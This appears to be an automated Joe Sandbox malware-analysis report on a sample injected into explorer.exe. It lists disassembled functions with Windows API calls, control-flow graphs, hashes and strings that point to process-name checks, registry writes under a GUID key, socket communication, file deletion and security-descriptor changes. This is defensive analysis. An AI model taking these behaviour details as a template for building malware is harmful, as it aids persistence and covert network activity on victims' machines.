                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem_errno_invalid_parameter_noinfolstrcmpi
                          • String ID: %s\svchost.exe
                          • API String ID: 3414592467-1955667316
                          • Opcode ID: e58c8e807cef45b58eb412dc696d3ca7086278a892d9b9d0cc68856432e9e4b3
                          • Instruction ID: 0cb0ccca386293e5d08132085dd7e6989bb66359d8357ec021db90d7b5a1d6bd
                          • Opcode Fuzzy Hash: e58c8e807cef45b58eb412dc696d3ca7086278a892d9b9d0cc68856432e9e4b3
                          • Instruction Fuzzy Hash: C621FA35254A5582EB389B15E8943EA6361FBC8BA9F000135EB8E47B78CF3CC599CB40
                          Function 01199C50 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 57memorystringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 868 1199c50-1199c6f LocalAlloc 869 1199d5a 868->869 870 1199c75-1199c90 LocalAlloc 868->870 871 1199d5c-1199d60 869->871 872 1199d4f-1199d54 LocalFree 870->872 873 1199c96-1199cb1 LocalAlloc 870->873 872->869 874 1199d44-1199d49 LocalFree 873->874 875 1199cb7-1199ccc GetModuleFileNameW 873->875 874->872 876 1199d39-1199d3e LocalFree 875->876 877 1199cce-1199ce0 GetWindowsDirectoryW 875->877 876->874 877->876 878 1199ce2-1199d0f call 11b84a8 lstrcmpiW 877->878 878->876 881 1199d11-1199d37 LocalFree * 3 878->881 881->871
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc$DirectoryFileModuleNameWindows_errno_invalid_parameter_noinfolstrcmpi
                          • String ID: %s\explorer.exe
                          • API String ID: 3179574994-2893622748
                          • Opcode ID: 428531350e7e704850b3dc85deda95e0abcba54834e33c1fd42cb07a9522b708
                          • Instruction ID: 812eea76976b40c98fa62d3ca793359f62c7caaa098d3c666bc29e95fffa8eea
                          • Opcode Fuzzy Hash: 428531350e7e704850b3dc85deda95e0abcba54834e33c1fd42cb07a9522b708
                          • Instruction Fuzzy Hash: DC21FC35254A5182EB389F15F8947AA67A1FBC8B99F040135EB8E47B78CF3CC599CB40
                          Function 011B52E0 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 255stringnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 896 11b52e0-11b5341 lstrlenW call 11b58e0 899 11b58c9 896->899 900 11b5347-11b534f 896->900 901 11b58cb-11b58d2 899->901 902 11b535b 900->902 903 11b5351-11b5359 900->903 904 11b5363-11b53d9 call 11b3c70 902->904 903->904 904->899 907 11b53df-11b5424 setsockopt 904->907 908 11b542a-11b546c call 11b4dc0 907->908 909 11b58a8-11b58c3 shutdown closesocket 907->909 908->909 912 11b5472-11b54b7 call 11b4870 908->912 909->899 912->909 915 11b54bd-11b54c5 912->915 915->909 916 11b54cb-11b551b call 11b4dc0 915->916 916->909 919 11b5521-11b5566 call 11b4870 916->919 919->909 922 11b556c-11b5574 919->922 922->909 923 11b557a-11b55ca call 11b4dc0 922->923 923->909 926 11b55d0-11b55e6 call 11b5ce0 923->926 926->909 929 11b55ec-11b5633 call 11b4dc0 926->929 932 11b589a-11b58a2 LocalFree 929->932 933 11b5639-11b567e call 11b4870 929->933 932->909 933->932 936 11b5684-11b568c 933->936 936->932 937 11b5692-11b56e2 call 11b4dc0 936->937 937->932 940 11b56e8-11b56fe call 11b5ad0 937->940 940->932 943 11b5704-11b574b call 11b4dc0 940->943 946 11b588c-11b5894 LocalFree 943->946 947 11b5751-11b5796 call 11b4870 943->947 946->932 947->946 950 11b579c-11b57a4 947->950 950->946 951 11b57aa-11b57ef call 11b4870 950->951 951->946 954 11b57f5-11b57fd 951->954 954->946 955 11b5803-11b5827 CreateEventW 954->955 955->946 956 11b5829-11b5847 WSAEventSelect 955->956 957 11b5849-11b587c call 11b2100 956->957 958 11b587e-11b5886 CloseHandle 956->958 957->901 958->946
                          APIs
                          • lstrlenW.KERNEL32 ref: 011B531D
                            • Part of subcall function 011B58E0: CoInitializeEx.COMBASE ref: 011B590A
                            • Part of subcall function 011B58E0: CoCreateGuid.COMBASE ref: 011B591D
                            • Part of subcall function 011B58E0: StringFromGUID2.COMBASE ref: 011B593B
                            • Part of subcall function 011B58E0: wsprintfA.USER32 ref: 011B595D
                            • Part of subcall function 011B58E0: LocalAlloc.KERNEL32 ref: 011B596D
                            • Part of subcall function 011B58E0: und_memcpy.LIBCMTD ref: 011B59E4
                            • Part of subcall function 011B58E0: LocalFree.KERNEL32 ref: 011B59F1
                            • Part of subcall function 011B58E0: CoUninitialize.COMBASE ref: 011B59F7
                          • setsockopt.WS2_32 ref: 011B541C
                          • LocalFree.KERNEL32 ref: 011B58A2
                            • Part of subcall function 011B4870: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B48AF
                            • Part of subcall function 011B5AD0: LocalAlloc.KERNEL32 ref: 011B5AE1
                            • Part of subcall function 011B5AD0: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B56ED), ref: 011B5AFF
                            • Part of subcall function 011B5AD0: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B56ED), ref: 011B5B17
                            • Part of subcall function 011B4DC0: WSACreateEvent.WS2_32 ref: 011B4E59
                          • LocalFree.KERNEL32 ref: 011B5894
                            • Part of subcall function 011B4870: WSACreateEvent.WS2_32 ref: 011B4909
                          • CreateEventW.KERNEL32 ref: 011B5810
                          • WSAEventSelect.WS2_32 ref: 011B583F
                          • und_memcpy.LIBCMTD ref: 011B586F
                          • CloseHandle.KERNEL32 ref: 011B5886
                          • shutdown.WS2_32 ref: 011B58B5
                          • closesocket.WS2_32 ref: 011B58C3
                            • Part of subcall function 011B5CE0: LocalAlloc.KERNEL32 ref: 011B5CF1
                            • Part of subcall function 011B5CE0: lstrcpyW.KERNEL32 ref: 011B5D35
                            • Part of subcall function 011B5CE0: GetModuleFileNameW.KERNEL32 ref: 011B5D55
                            • Part of subcall function 011B5CE0: LocalFree.KERNEL32 ref: 011B5D64
                            • Part of subcall function 011B4DC0: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B4DFF
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$CreateEventTimer$Alloc$ChangeConcurrency::details::platform::__Queueund_memcpy$CloseFileFromGuidHandleInitializeLibraryLoadModuleNameSelectStringUninitializeclosesocketlstrcpylstrlensetsockoptshutdownwsprintf
                          • String ID: 8
                          • API String ID: 1160820747-4194326291
                          • Opcode ID: 703cba8a721852ba4601ddda7d12de819128d615945ba6f413280689a9c86afc
                          • Instruction ID: 7a4c6c8bb79ed7c3ac405d7ca4895bc07be70aeea830a29dacbf934292ff2ab0
                          • Opcode Fuzzy Hash: 703cba8a721852ba4601ddda7d12de819128d615945ba6f413280689a9c86afc
                          • Instruction Fuzzy Hash: 0BD1B176218BC08AE7B59B15E4843CAB7A5F389798F804526EB8D47B68DF7CC194CF40
                          Function 011A79F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63windowregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister
                          • String ID: {AD5A477B-A974-48CA-8A4F-BBC77609C010}
                          • API String ID: 1237952354-284598728
                          • Opcode ID: ad3a778cf11879ea102bad5402e918288342321862edad1c1d477f0e84bd2696
                          • Instruction ID: f8a928655c81b3a587ab9a15a34a46635d5b99fd7def89f26e2d015ac9a31d67
                          • Opcode Fuzzy Hash: ad3a778cf11879ea102bad5402e918288342321862edad1c1d477f0e84bd2696
                          • Instruction Fuzzy Hash: 27310D75214B89C2E768AF14F8947DA77B1F784758F90113AE78A46AB4DF3DC14ACB00
                          Function 011B4870 Relevance: 16.7, APIs: 11, Instructions: 234timeCOMMON
                          Download Yara Rule
                          APIs
                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B48AF
                            • Part of subcall function 011B34A0: recv.WS2_32 ref: 011B34CC
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timer$ChangeConcurrency::details::platform::__Queuerecv
                          • String ID:
                          • API String ID: 2709879575-0
                          • Opcode ID: ee436ca40872bfd55d0d14185852ad7327cbddb359225007291187d638ed94ef
                          • Instruction ID: 0268fe61e2eaeb776dddabe2483bf0e95f7eb3cff9f203f324b914d1eae218f5
                          • Opcode Fuzzy Hash: ee436ca40872bfd55d0d14185852ad7327cbddb359225007291187d638ed94ef
                          • Instruction Fuzzy Hash: BBC1C476208BC0CAE779CF19E4947EAB7A1F788744F01811AD78A87B59DB79C485CF02
                          Function 01199070 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 96COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameW.KERNEL32 ref: 0119909E
                          • GetWindowsDirectoryW.KERNEL32 ref: 011990D7
                          • GetSystemDirectoryW.KERNEL32 ref: 01199110
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • StrCmpIW.SHLWAPI ref: 011991E8
                          • StrCmpIW.SHLWAPI ref: 011991FF
                          • StrCmpIW.SHLWAPI ref: 01199216
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Directory$FileModuleNameSystemWindows_errno_invalid_parameter_noinfo
                          • String ID: %s\cmd.exe$%s\explorer.exe$%s\svchost.exe
                          • API String ID: 4125122012-2596767422
                          • Opcode ID: 0ce3380aaa9718ec791bb1e918982070712ec6b03a28ba819b3a061c451fb4e7
                          • Instruction ID: 0bf7544119ed1cffb4d12e36df33df38d4f1396b9210896813c72b2c9b6937db
                          • Opcode Fuzzy Hash: 0ce3380aaa9718ec791bb1e918982070712ec6b03a28ba819b3a061c451fb4e7
                          • Instruction Fuzzy Hash: 4F411D21314AC992DB74DB24E8943DB63A6F788744F804536879DC3A68EF3DC619CB41
                          Function 0119F510 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • SHGetKnownFolderPath.SHELL32 ref: 0119F587
                          • lstrlenW.KERNEL32 ref: 0119F59A
                          • lstrlenW.KERNEL32 ref: 0119F5B5
                          • LocalAlloc.KERNEL32 ref: 0119F5DC
                          • CoTaskMemFree.COMBASE ref: 0119F647
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • lstrlenW.KERNEL32 ref: 0119F620
                          • CoTaskMemFree.COMBASE ref: 0119F635
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$FreeTask$AllocFolderKnownLocalPath_errno_invalid_parameter_noinfo
                          • String ID: %s\%s\
                          • API String ID: 2748012262-2168696002
                          • Opcode ID: c67f25852d0db48f00a9db175582164c04bb3a1d8cde8ffb0c1091e28077b100
                          • Instruction ID: ead09d3de8cec1818f7ff58e222884efa6b697635b6bdddc79aa94e2dcf1aefb
                          • Opcode Fuzzy Hash: c67f25852d0db48f00a9db175582164c04bb3a1d8cde8ffb0c1091e28077b100
                          • Instruction Fuzzy Hash: BB310D32218A8586DB54DB29F89439AB7B1F7C9B94F544025EB8E83B68DF7CC546CB00
                          Function 0119FA60 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0119F510: SHGetKnownFolderPath.SHELL32 ref: 0119F587
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F59A
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F5B5
                            • Part of subcall function 0119F510: LocalAlloc.KERNEL32 ref: 0119F5DC
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F620
                            • Part of subcall function 0119F510: CoTaskMemFree.COMBASE ref: 0119F635
                          • GetFileAttributesW.KERNEL32 ref: 0119FB60
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • DeleteFileW.KERNEL32 ref: 0119FB1A
                          • RemoveDirectoryW.KERNEL32 ref: 0119FB2D
                          • LocalFree.KERNEL32 ref: 0119FB40
                          • LocalFree.KERNEL32 ref: 0119FB55
                          • GetFileAttributesW.KERNEL32 ref: 0119FB77
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileFreeLocallstrlen$Attributes$AllocDeleteDirectoryFolderKnownPathRemoveTask_errno_invalid_parameter_noinfo
                          • String ID: %s%s$Spotify.exe
                          • API String ID: 2317434139-2674492433
                          • Opcode ID: 914aa335a63efcf3c90bc4a69d0561e7c4bba87e2c4adeacd6fcf01560c629b6
                          • Instruction ID: 35a4c94e9e942725b94b987da1bfadf850de7274a8caa33e0eb549a3286df679
                          • Opcode Fuzzy Hash: 914aa335a63efcf3c90bc4a69d0561e7c4bba87e2c4adeacd6fcf01560c629b6
                          • Instruction Fuzzy Hash: EB21103122498591DB68DF24E8983DA6761F7C4B54F800626D76EC36B8EF3CC98ACB00
                          Function 011B58E0 Relevance: 13.6, APIs: 9, Instructions: 57memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: LocalUninitialize$AllocCreateFreeFromGuidInitializeStringund_memcpywsprintf
                          • String ID:
                          • API String ID: 3539965953-0
                          • Opcode ID: f1b201f5a9eed3eaf9a523d0c2121b2386c6f2c61ced3d45e5eb14289178c037
                          • Instruction ID: 65d8ca4ee74c4bd1f93ae21fb54599b0eb953cf0445968927151326beaadf6d4
                          • Opcode Fuzzy Hash: f1b201f5a9eed3eaf9a523d0c2121b2386c6f2c61ced3d45e5eb14289178c037
                          • Instruction Fuzzy Hash: 00210E72324BC582DB78EF25E8943DE6361F7C5B84F844429D68A87A64DF3CC149CB40
                          Function 011952C0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • RegCreateKeyExW.KERNEL32 ref: 01195340
                          • RegSetValueExW.KERNEL32 ref: 01195374
                          • RegCloseKey.ADVAPI32 ref: 01195383
                          • RegCloseKey.ADVAPI32 ref: 01195395
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$CreateValue_errno_invalid_parameter_noinfo
                          • String ID: ?$SOFTWARE\%s${2046C745-B848-47EE-8068-B039EAC15A1C}
                          • API String ID: 3235468379-835248637
                          • Opcode ID: 40145f79fe73d992d313a2094e33a8d981a89d509cec35542f6e7a0e3b56c4a9
                          • Instruction ID: 01bf905eb8a07c7fda5b08a858bcbe7e3c9a5f44cea9cddfcd0f9ff9b16143b0
                          • Opcode Fuzzy Hash: 40145f79fe73d992d313a2094e33a8d981a89d509cec35542f6e7a0e3b56c4a9
                          • Instruction Fuzzy Hash: 67214C32218B84C2E754DF65F8987DAB7A5F784798F800126EA8E43B68DFBCC145CB04
                          Function 0119F790 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7AF
                          • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7C3
                          • wnsprintfW.SHLWAPI ref: 0119F7FC
                          • lstrlenW.KERNEL32 ref: 0119F80B
                          • CoTaskMemFree.COMBASE ref: 0119F81D
                          • CoTaskMemFree.COMBASE ref: 0119F82F
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeTask$AllocFolderKnownLocalPathlstrlenwnsprintf
                          • String ID: %s\%s
                          • API String ID: 1665550476-4073750446
                          • Opcode ID: 7be9eb387fcb5a12c99e2256ef6ef75da49a5be100ce487a794dec0c98c24ef7
                          • Instruction ID: 7d4144c904f0c7a3fbb6a7e7639eac77baa333434cda02fcbbe2783cd644d09e
                          • Opcode Fuzzy Hash: 7be9eb387fcb5a12c99e2256ef6ef75da49a5be100ce487a794dec0c98c24ef7
                          • Instruction Fuzzy Hash: 01111C31628A9582E7489F15E8547DA77A0FBC4B98F405025FA8F86A38DF7CC046CB00
                          Function 011AE3B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                          Download Yara Rule
                          APIs
                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 011AE3F7
                          • GetSecurityDescriptorSacl.ADVAPI32 ref: 011AE415
                          • SetNamedSecurityInfoW.ADVAPI32 ref: 011AE44E
                          • LocalFree.KERNEL32 ref: 011AE45D
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
